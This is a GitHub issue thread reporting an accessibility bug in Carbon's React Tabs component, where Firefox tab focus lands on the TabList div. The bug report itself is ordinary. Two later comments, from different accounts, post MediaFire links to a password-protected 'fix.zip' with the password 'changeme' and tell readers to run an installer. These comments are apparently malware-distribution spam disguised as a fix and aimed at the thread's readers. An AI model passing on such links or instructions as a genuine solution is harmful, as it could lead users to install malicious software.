### ISSUE TITLE
[a11y]: Tabs focus going to TabList div in Firefox

### ISSUE THREAD

**Issue by makafsal** [carbon-design-system/carbon#17287]
### Package

@carbon/react

### Browser

Firefox

### Operating System

Windows, MacOS

### Package version

v1.64.0

### React version

v18.2.0

### Automated testing tool and ruleset

Manual

### Description

When hitting the tab key in Firefox, the focus goes to the `TabList` div element.

### Reproduction/example

https://github.com/user-attachments/assets/12cc21e4-f66f-480f-b210-8d85c299c153

https://react.carbondesignsystem.com/?path=/story/components-tabs--default

### Steps to reproduce

1. Open in Firefox: https://react.carbondesignsystem.com/?path=/story/components-tabs--default
2. Move to the main content and press the tab key to focus on the tab item
3. Observe that the tab is focused on the `TabList` div element

### Suggested Severity

Severity 3 = User can complete task, and/or has a workaround within the user experience of a given component.

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
